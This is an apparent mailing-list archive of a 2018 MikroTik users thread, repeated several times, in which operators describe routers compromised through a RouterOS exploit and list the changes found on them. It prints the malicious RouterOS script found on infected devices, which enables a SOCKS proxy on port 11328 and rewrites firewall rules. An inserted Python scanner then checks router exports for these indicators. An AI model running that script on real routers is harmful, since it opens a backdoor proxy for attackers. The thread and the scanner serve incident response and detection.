Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

2018-08-06 Thread Scott Reed via Mikrotik-users

Right.

I wanted to make sure people know that there are lots of things that may 
or may not be impacted if a device is infected.  You either have to 
totally delete the configuration and restore from backup or you need to 
go through every menu item and make sure they have not been changed.



On 8/6/2018 6:55, Tim wrote:


This has been detected in devices with earlier versions of ROS.

From: mikrotik-users-boun...@wispa.org On Behalf Of Scott Reed via Mikrotik-users
Sent: Monday, August 6, 2018 5:58 AM
To: mikrotik-users@wispa.org
Subject: Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

It will also change device identity, change admin password, add Admin, 
add 5 firewall filter rules to redirect forward traffic, change DNS 
server, enable DDNS, add IP Web Proxy rules and more, but that is all 
I remember off the top of my head.


On 8/5/2018 20:57, Bob Pensworth via Mikrotik-users wrote:

We are finding an IP/Socks connection:

We are finding an event entry in System/Scheduler

And the (below) script in System/Script:

/ip firewall filter remove [/ip firewall filter find where comment ~ "port [0-9]*"];
/ip socks set enabled=yes port=11328 max-connections=255 connection-idle-timeout=60;
/ip socks access remove [/ip socks access find];
/ip firewall filter add chain=input protocol=tcp port=11328 action=accept comment="port 11328";
/ip firewall filter move [/ip firewall filter find comment="port 11328"] 1;

-- 


Bob Pensworth, WA7BOB | General Manager

CresComm WiFi, LLC  | (360) 928-, x1

From: mikrotik-users-boun...@wispa.org On Behalf Of Shawn C. Peppers via Mikrotik-users
Sent: Friday, March 16, 2018 11:54 AM
To: mikrotik-users@wispa.org; memb...@wisp.org
Subject: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

I have not tested this yet but


https://www.coresecurity.com/advisories/mikrotik-routeros-smb-buffer-overflow

:: // Shawn Peppers

:: // DirectlinkAdmin.com 




___

Mikrotik-users mailing list

Mikrotik-users@wispa.org 

http://lists.wispa.org/mailman/listinfo/mikrotik-users



--
Scott Reed
SBRConsulting, LLC
Network and Wireless Consulting
WISPA Vendor Member
IN UMC Associate Lay Leader
SLI Coach Trained

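The thread's advice is to either restore a known-good configuration or walk every menu looking for changes, and the posted script gives concrete indicators (socks proxy enabled on port 11328, an input rule commented "port 11328", a scheduler entry driving a stored script, plus the DDNS, web proxy, identity and DNS changes Scott lists). The following Python scanner is an added example, not code from the list or from MikroTik: it runs the indicator checks over the text of a RouterOS "/export" and also diffs that export against a trusted baseline, which catches the changes (identity, DNS server, admin user) that have no fixed signature. Both export texts are constructed samples; the RouterOS command paths used in them (/ip socks, /ip cloud, /ip proxy, /system scheduler, /system script) are real, but the values, names and addresses are made up for the demo.

```python
import re
from typing import Dict, List

# Constructed sample of "/export" output from a device showing the changes the
# thread describes. Not a real capture; addresses are from documentation ranges.
SAMPLE_EXPORT = """\
/system identity set name=NEWIDENTITY
/ip socks set enabled=yes port=11328 max-connections=255 connection-idle-timeout=60
/ip firewall filter add chain=input protocol=tcp port=11328 action=accept comment="port 11328"
/ip firewall filter add chain=input protocol=tcp dst-port=8291 action=accept comment="winbox"
/ip cloud set ddns-enabled=yes
/ip proxy set enabled=yes port=8080
/system scheduler add name=update-check interval=1h on-event=script-1
/system script add name=script-1 source="/ip socks set enabled=yes port=11328"
/ip dns set servers=203.0.113.5
"""

# Constructed known-good export of the same device, taken before the incident.
SAMPLE_BASELINE = """\
/system identity set name=branch-router
/ip firewall filter add chain=input protocol=tcp dst-port=8291 action=accept comment="winbox"
/ip dns set servers=192.0.2.53
"""

# Indicator checks keyed by a short name; the patterns cover what the thread reports.
CHECKS = {
    "socks_enabled": re.compile(r"^/ip socks set .*\benabled=yes\b"),
    "port_11328": re.compile(r"\bport=11328\b"),              # port used by the posted script
    "port_comment_rule": re.compile(r'comment="port [0-9]+"'),  # rules the script adds/removes
    "ddns_enabled": re.compile(r"^/ip cloud set .*\bddns-enabled=yes\b"),
    "web_proxy_enabled": re.compile(r"^/ip proxy set .*\benabled=yes\b"),
    "scheduler_entry": re.compile(r"^/system scheduler add\b"),
    "stored_script": re.compile(r"^/system script add\b"),
}


def scan_export(export_text: str) -> Dict[str, List[str]]:
    """Return {indicator: [matching export lines]} for every indicator that fires."""
    findings: Dict[str, List[str]] = {}
    for raw in export_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):   # "/export" prints a "# <timestamp>" header
            continue
        for name, pattern in CHECKS.items():
            if pattern.search(line):
                findings.setdefault(name, []).append(line)
    return findings


def diff_against_baseline(baseline_text: str, current_text: str) -> Dict[str, List[str]]:
    """Line-set difference between a trusted export and the current one.

    This is the "compare with your backup" approach: anything in 'added' was not on
    the device when the baseline was taken, anything in 'removed' has disappeared.
    A changed identity or DNS server shows up as one removed plus one added line.
    """
    def norm(text: str) -> set:
        return {l.strip() for l in text.splitlines() if l.strip()}
    base, cur = norm(baseline_text), norm(current_text)
    return {"added": sorted(cur - base), "removed": sorted(base - cur)}


def report(export_text: str, baseline_text: str = "") -> str:
    """Human-readable summary of both checks."""
    lines = []
    for name, hits in scan_export(export_text).items():
        lines.append(f"[{name}] {len(hits)} hit(s)")
        lines.extend("    " + h for h in hits)
    if baseline_text:
        d = diff_against_baseline(baseline_text, export_text)
        lines.append(f"[baseline diff] +{len(d['added'])} / -{len(d['removed'])} lines")
        lines.extend("  + " + l for l in d["added"])
        lines.extend("  - " + l for l in d["removed"])
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(SAMPLE_EXPORT, SAMPLE_BASELINE))
```

The signature checks alone would miss the identity and DNS changes in the sample; the baseline diff reports them as a removed line plus an added line, which is why keeping a clean export per device is worth more than any fixed indicator list. On a real device the export text would come from the "/export" command's output rather than the embedded sample.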


Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

2018-08-06 Thread Tim via Mikrotik-users
This has been detected in devices with earlier versions of ROS.



From: mikrotik-users-boun...@wispa.org  On 
Behalf Of Scott Reed via Mikrotik-users
Sent: Monday, August 6, 2018 5:58 AM
To: mikrotik-users@wispa.org
Subject: Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27



It will also change device identity, change admin password, add Admin, add 5 
firewall filter rules to redirect forward traffic, change DNS server, enable 
DDNS, add IP Web Proxy rules and more, but that is all I remember off the top 
of my head.



On 8/5/2018 20:57, Bob Pensworth via Mikrotik-users wrote:

We are finding an IP/Socks connection:

We are finding an event entry in System/Scheduler

And the (below) script in System/Script:



/ip firewall filter remove [/ip firewall filter find where comment ~ "port [0-9]*"];
/ip socks set enabled=yes port=11328 max-connections=255 connection-idle-timeout=60;
/ip socks access remove [/ip socks access find];
/ip firewall filter add chain=input protocol=tcp port=11328 action=accept comment="port 11328";
/ip firewall filter move [/ip firewall filter find comment="port 11328"] 1;


From: mikrotik-users-boun...@wispa.org On Behalf Of Shawn C. Peppers via Mikrotik-users
Sent: Friday, March 16, 2018 11:54 AM
To: mikrotik-users@wispa.org; memb...@wisp.org
Subject: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27



I have not tested this yet but



https://www.coresecurity.com/advisories/mikrotik-routeros-smb-buffer-overflow

:: // Shawn Peppers

:: // DirectlinkAdmin.com 


Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

2018-08-06 Thread Scott Reed via Mikrotik-users
It will also change device identity, change admin password, add Admin, 
add 5 firewall filter rules to redirect forward traffic, change DNS 
server, enable DDNS, add IP Web Proxy rules and more, but that is all I 
remember off the top of my head.



On 8/5/2018 20:57, Bob Pensworth via Mikrotik-users wrote:


We are finding an IP/Socks connection:

We are finding an event entry in System/Scheduler

And the (below) script in System/Script:

/ip firewall filter remove [/ip firewall filter find where comment ~ "port [0-9]*"];
/ip socks set enabled=yes port=11328 max-connections=255 connection-idle-timeout=60;
/ip socks access remove [/ip socks access find];
/ip firewall filter add chain=input protocol=tcp port=11328 action=accept comment="port 11328";
/ip firewall filter move [/ip firewall filter find comment="port 11328"] 1;


From: mikrotik-users-boun...@wispa.org On Behalf Of Shawn C. Peppers via Mikrotik-users
Sent: Friday, March 16, 2018 11:54 AM
To: mikrotik-users@wispa.org; memb...@wisp.org
Subject: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

I have not tested this yet but

https://www.coresecurity.com/advisories/mikrotik-routeros-smb-buffer-overflow

:: // Shawn Peppers

:: // DirectlinkAdmin.com 